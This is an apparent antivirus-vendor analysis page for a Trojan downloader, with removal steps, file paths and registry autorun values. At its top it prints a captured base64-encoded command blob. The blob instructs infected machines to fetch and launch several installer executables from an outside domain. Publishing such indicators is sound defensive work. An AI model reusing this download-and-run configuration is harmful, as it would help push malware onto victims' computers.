Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA4MzEiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDgzMSIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDgzMSIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwODMxIiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL2JyYXRpdG
xhbWlvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwODMxIi8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA4MzEiIG1h
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3360
    Sho9libi.exe:3352
    SecondL.exe:2304
    OneTwo.exe:2324

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe (7856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe (146738 bytes)
    C:\config.conf (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe.config (1 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (1404 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (1404 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe (204 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe.config (1 bytes)
    %Program Files%\9HE87PWAKQ\9HE87PWAK.exe.config (1 bytes)
    %Program Files%\9HE87PWAKQ\uninstaller.exe (19389 bytes)
    %Program Files%\9HE87PWAKQ\uninstaller.exe.config (1 bytes)
    %Program Files%\9HE87PWAKQ\cast.config (37 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_HA00P" = "C:\%original file name%.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "lb5nwgevyag" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "34Y2QEO0XU7NPC7" = "%Program Files%\9HE87PWAKQ\9HE87PWAK.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now